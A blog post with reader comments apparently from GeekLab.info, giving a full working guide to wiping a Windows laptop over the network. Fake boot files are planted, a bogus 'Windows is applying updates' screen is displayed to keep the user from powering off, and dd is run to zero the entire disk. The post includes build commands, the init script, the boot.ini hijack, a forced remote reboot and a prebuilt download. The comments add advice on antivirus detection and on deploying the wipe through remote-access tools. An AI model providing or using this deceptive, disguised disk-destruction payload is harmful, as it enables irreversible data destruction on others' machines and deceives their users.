Remote wipe for Windows clients

I've recently had this situation where an employee was fired, and then refused to return 'his' laptop to the company. I cannot break into his home to return the hardware. But at least, I can make sure the software volume licences are really removed from the hardware. I did this with my own, self-built remote wipe function.

How to do a remote wipe of a Windows client that you own? WARNING: DO NOT use this method on other people's computers! Don't ever do vandalism, just use this to protect your data from thieves.

Prebuilt software

Below is a manual on creating software to wipe a system. You may also download my prebuilt software. Unzipping this in the c:\ of your computer will wipe the harddisk.

Social solution for technical limitations

The bootsector of a harddrive is overwritten in a jiffy. But this can easily be restored with special tools. If you overwrite the whole harddisk, the data cannot be restored. But overwriting takes a lot of time.
If you're telling the thief "hey, i'm now overwriting the harddisk", he'll probably switch it off. So we need to scare the thief into not turning of the computer. I did this by printing a text "microsoft update being installed" and saying that the user should absolutely not switch off the computer.

Requirements

To build the software for a remote wipe, you need:

  • Administrator access to the stolen laptop
  • A virtual machine (like VMWare) to test it. An identical laptop would even be better, 'cause it has the exact same drivers.

Step 1. Build grub bootloader

You can build your own bootloader or use my grldr. Compiling on my x86_64 didn't work, use a 32 bit system (or fix the libs yourself)!

mkdir /tmp/bootloader
cd /tmp/bootloader
wget http://download.gna.org/grub4dos/grub4dos-0.4.4-src.zip
unzip grub4dos-0.4.4-src.zip
cd grub4dos-0.4.4
chmod +x configure build
vim stage2/boot.c
//edit line 298 and 960 and to scare the laptop thief into not switching off the computer.
make

In grub4dos-temp/grub4dos-0.4.4/ you'll find a file grldr. This is the grub bootloader. Copy it to the c:\ of the computer you want to wipe.

Step 2. Get yourself a linux kernel

I simply used the running CentOS kernel of my development machine, named /boot/vmlinuz-2.6.18-194.26.1.el5. I renamed this file to bzImage and copied it to the c:\ of the "victim".

Step 3. Make a initrd

With a regular Linux installation, all files are placed on a Linux (ext2, ext3, ext4, xfs or btrfs) partition. Unfortunately, we don't have such a partition. Thats why we put all tools in a initrd (initial ramdisk). We may need SATA drivers, so as a base we use the initrd associated with the kernel we use, which is /boot/initrd-2.6.18-194.26.1.el5.img

mkdir /tmp/initrd
cd /tmp/initrd
cat /boot/initrd-2.6.18-194.26.1.el5.img | gzip -d | cpio -id
cd bin
#Download a statically linked "dd" executable. (Or build it yourself)
wget https://www.geeklab.info/wp-content/uploads/2010/12/dd.zip
unzip dd.zip && rm dd.zip
cd ..

Now edit the file "init" to load all required drivers, make /dev nodes and finally wipe the system. My init file contains:

#!/bin/nash
echo
echo
# here I have 40 more echo's, like a "tput clear" without having the tput command
echo
echo
echo "Microsoft(TM) Windows(TM) is applying updates."
echo
echo
echo "Running pre-update checks:"
echo "- Windows kernel: OK"
echo "- Drivers: OK"
sleep 1
echo "- Diskspace: OK"
echo "- Disk fragmentation: Defragmentation required to continue"
sleep 1
echo " Defragmenting harddisk. This may take a while. Please wait..."
echo " WARNING: Do not turn off your computer to prevent damage"
echo ""
mount -t proc /proc /proc
mount -t sysfs /sys /sys
mount -o mode=0755 -t tmpfs /dev /dev
mkdir /dev/pts
mount -t devpts -o gid=5,mode=620 /dev/pts /dev/pts
mkdir /dev/shm
mkdir /dev/mapper
mknod /dev/null c 1 3
mknod /dev/zero c 1 5
mknod /dev/urandom c 1 9
mknod /dev/systty c 4 0
mknod /dev/tty c 5 0
mknod /dev/console c 5 1
mknod /dev/ptmx c 5 2
mknod /dev/rtc c 10 135
mknod /dev/tty0 c 4 0
mknod /dev/tty1 c 4 1
hotplug
mkblkdevs
insmod /lib/scsi_mod.ko
insmod /lib/libata.ko
#insmod /lib/sata_via.ko #or other drivers
mkblkdevs
dd if=/dev/zero of=/dev/?da #either sda or hda

Warning: You may need drivers to access the harddisk, for instance ahci.ko. Check the "victims" chipset and load the correct drivers.
Finally, merge the files to 1 initrd file: find ./ | cpio -H newc -o | gzip > /tmp/initrd.gz and copy it to c:\ of the "victim".

Step 4: menu.lst

Create a file named menu.lst and place it in c:\

default 0
timeout 0
title Installing update
kernel (hd0,0)/bzImage quiet
initrd (hd0,0)/initrd.gz

Step 5: boot.ini

The hidden system file c:\boot.ini contains information for the ntldr bootloader windows uses. Remove the system and hidden attributes. Then edit boot.ini to contain the following information:

[boot loader]
timeout=0
default=c:\grldr
[operating systems]
c:\grldr="MSWIN Updater service"

Step 6: Check

The c:\ of the "victim" now contains:
c:\grldr
c:\menu.lst
c:\bzImage
c:\initrd.gz
c:\boot.ini
Check that all files exist.

Step 7: Reboot

With psshutdown (part of microsoft's pstools) reboot the "victim": psshutdown \\computer -r -t 0. Don't wait for the "victim" to reboot his computer, he may not reboot it but suspend instead.

© GeekLabInfo Remote wipe for Windows clients is a post from GeekLab.info. You are free to copy materials from GeekLab.info, but you are required to link back to http://www.geeklab.info

1 Star2 Stars3 Stars4 Stars5 Stars (4 votes, average: 4.50 out of 5)
Loading...

21 comments on “Remote wipe for Windows clients”

  1. Hmmm, overly complicated, obfuscated scripting that is intended to deceive the user/victim... No thanks.

  2. @the guy that has no name:
    1. Please get yourself a name, it makes social contact a lot easier! ;-)

    2. Yes, it's complicated, but if the other option is to leave thousands of dollars woth of data in the hands of a thief, I think it's the best option. And the word 'geek' in the name of my site means we like complicated stuff.

    3. I hadn't documented the reason why you have to deceive the thief very well. I wrote a block on it now. Unfortunately, it's required to buy yourself time to overwrite a significant part of the harddisk.

  3. Connecting to the Internet costs me money.
    Please disable your ads or find a way to pay for my bandwidth.

  4. @Anonymous:
    Sorry that my ad-blocker-blocker was annoying to you. But if you want to use my knowledge and research, you must view my ads. That's you paying for MY bandwidth you've used to visit my site.

    If you don't like that, please contact me. I'll be glad to remove the ads if you pay me the real value of the information I'm now giving you for free.

  5. Does this work with Win7, I tried your prebuilt software on my virtual win7-32bit, at boot up windows boot manager gives the option 1) Windows 7 OR 2) MSWIN updater service.
    Choosing option 2 returns error "windows failed to start etc.....file\grldr", the harddrive is not wiped, ant the system can be rebooted.

    Is there a way of having the hdd delete sequence start up automatically after rebooting win 7 ?

  6. Yes, this should work on Win7 as well. Actually, it doesn't use any windows files except for the boot loader. If you can tell the bootloader to start grldr, you're all set.

    The error you mentioned means that probably the grldr file is placed in the wrong directory, it must be in c:\.

    Also make sure that your initrd has the right kernel modules loaded to be able to access the harddrive. (But that's step 2, you're stuck at step 1 now.)

  7. Here is what I did. I downloaded remotewipe.zip to desktop. Extracted the files, then copied all files to C:\ using win explorer.

    WIN7 - I try to reboot but I get the above message in Win 7.

    WINXP - I retried on a win xp image; this time I got the "windows applying updates etc " message, then "memory crash kernel, 0x0 0x0, not within permissible range" then "kernel panic - not syncing: Attempted to kill init!" The information on the drive was still intact.

    Am I placing the files in the wrong directory ?

  8. Hi Maz,

    http://wiki.centos.org/Manuals/ReleaseNotes/CentOS5.1 says:
    During the boot process you may see the message "Memory for crash kernel (0x0 to 0x0) notwithin permissible range" appear. This message comes from the new kdump infrastructure. It is a harmless message and can be safely ignored.

    The other error IS fatal however. Sounds like it cannot start init for some reason. Are there any other warnings or errors?

    My build is a specific build for my computer. It could run on ANY operating system that is installed on my computer. But if you have different hardware, you may need to include kernel modules for that specific hardware.

    Btw, what is your situation? Are you just trying for fun, or do you really need the fix? It sounds like you still have physical access to the machine you're trying to wipe?

  9. I will try again. Although I am sure the siles are in C:\

    Is there an alternate way of wiping a laptop. I have an employee that is being difficult in returning our company laptop, fortunately I have "logmein" installed and active on the laptop. As I don't have the luxury of logging in for extended periods I would like a quick 5 minute procedure that would enable me to wipe the data.

    All help is appreciated....Thanks

  10. Kind of the same situation I had.

    I got in because the laptop connected to the office vpn automatically. Then I could use explorer to upload the files. To make this software work, you'll need to have quite some linux experience in order to use the right drivers.

    You COULD erase some boot files. For instance removing boot.ini means it won't boot. However, a computer repair shop could easily fix that. I wanted to make sure he couldn't get it fixed.

    What's the brand and type of the laptop?

  11. Its a Dell Inspiron 1520.

    I was considering LoJack, but of course that would require more than 5 mins to setup.

  12. AFAIK, LoJack is to recover stolen property, not to perform a remote wipe.

    The Dell Inspiron 1520 has a Intel Matrix Storage Manager A01 chipset. I can't find which kernel module is required for this. Hmm, maybe i should add all sorts of drivers to my own image, so it works on almost every computer...

    Maybe i'll do this next week...

  13. Does you prebuilt software work on windows xp & windows vista...??
    If the user has partitioned the drives into C,D,E,F...Will it wipe all data on all drives??
    Does this software gets detected as virus on scanned by an antivirus program.
    Can i send the software as an email attachment and the user downloads it and unzips it to do the wipe function.
    will all data be erased completely so that i cannot be recovered using any data recovery software?
    Pls advise...Ur advise will be very much appreciated

  14. Does you prebuilt software work on windows xp & windows vista...??

    Yes. It works on any operating system, as long as the IDE/SATA drivers are supported.

    If the user has partitioned the drives into C,D,E,F...Will it wipe all data on all drives??

    Yes, it wipes the whole harddrive, not the partition.

    Does this software gets detected as virus on scanned by an antivirus program.

    No, it's a regular Linux distribution that fires a program to kill the harddrive data. It isn't a virus.

    Can i send the software as an email attachment and the user downloads it and unzips it to do the wipe function.

    No, you need to install it on the harddrive yourself. Thus, you'll need to have full remote administrator access.

    will all data be erased completely so that i cannot be recovered using any data recovery software?

    The software overwrites the whole disk with zeroes. Forensic detectives may be able to recover data from the overwritten disk, but regular thieves don't. However, there is one problem: overwriting the whole disk takes a lot of time. If the user feels something is wrong, and powers down the system, not everything may be overwritten yet.

    In my case, I had full administrator access, knew exactly what hardware it was and had a user that was as stupid as a mule. Making him think the system was actually being updated wasn't that hard.

  15. I've tried your prebuilt software. It's not working. Got error "grldr not fould" but all the files are on their place:
    c:\grldr
    c:\menu.lst
    c:\bzImage
    c:\initrd.gz
    c:\boot.ini

  16. Grldr is the grub boot loader.

    There could be several reasons for this error. Most common reasons are related to LBA, the addressing of the harddisk. The bios can only address the first part of the harddisk. Only after loading the operating system with its (S)ATA drivers, every part of every disk can be accessed.

    In my case, the disk of the stolen computer was small. In your case, the disk may not be that small, and the grldr file may be in an unaddressable block.

    If you want to use this technique to wipe a stolen laptop, I really wouldn't know what to do. But if you still do have control over the computer, you could try to update the bios to get newer LBA support. Another option is to use mydefrag to move the file to the beginning of the disk. Latter solution has the risk that at some point in time, it is undone.

    This forum post is pretty useful.

  17. I'm in the same situation with hardware not being returned. I'm trying to run this on a server running 2008RC2

    I believe I have the modules loaded correctly, and I've manipulated the BCD to where it will boot grub, but now I get "error 15 file not found."

    I'm not sure if I repacked the initrd correctly. when I ran cpio -id initrd.cpio I received a few "Cannot mknod: Operation not permitted"

    Here are my steps to repack it:

    $find ./ | cpio -H newc -o > initrd.cpio
    $gzip initrd.cpio
    $mv initrd.cpio.gz initrd.gz

    Any ideas?

  18. Running cpio -id extracts files from initrd - some of these files are special files (character/block devices) that cannot be created as regular user.

    Run sudo -s or su - to become root first.

  19. Interesting Article!
    I'm not yet try these solution but i want to do this.
    it's good if you could update this awesome articles to meet thees days' operating system
    i mean not just xp, vista or 7 but 8, 8.1 and also 10.
    and yes making it work cross-hardware is even better.
    i will appreciated.
    wish we could write some script query to not only run it automatically on victim's system
    but to create some sort of socket listener service on net to ready hear to put self-destructive trigger from admin
    it's very necessary secret weapon for us, IT Mans.
    thanks for your all hard work, and appreciate for sharing good stuff with us.
    sincerely

  20. David you are real smart i know you can help me with a problem I am having. I have a Toshiba satellite c875d. Amd A4-4300M 2.5GHZ with ATI Radeon HD 7420G running Windows 8 (x64) build 9200. Ok so my mother had this laptop and then the screen got stepped on. I was able to remove the damaged led display and put the upper housing all back together as a joke ( I'm going to paint a wicked loading sign in the void lol) so the laptop has hdmi output which is what it will primarily be used for Netflix some research maybe a little windows 10 reviewing and so forth. Hey I'm doing the best I can with a freebie crushed laptop lol. Ok to the point. I can not find a way what so ever to upgrade, downgrade, wipe, install, or virtually do anything outside of the current OS because the UEFI display does not WILL not support the use of the Hdmi cable. And as I'm limited by tvs and monitors and what not I need help. My desktop doesn't have this problem. Same chord same tv same OS shows display all the time. So if you could help me fix display issue , which is anytime what so ever that windows OS isn't booted fully, or tell me how to nuke this hardrive remotely from my desktop via Ethernet or home network or anything something please lol. I'm savvy enough just not versed enough.

Leave a Reply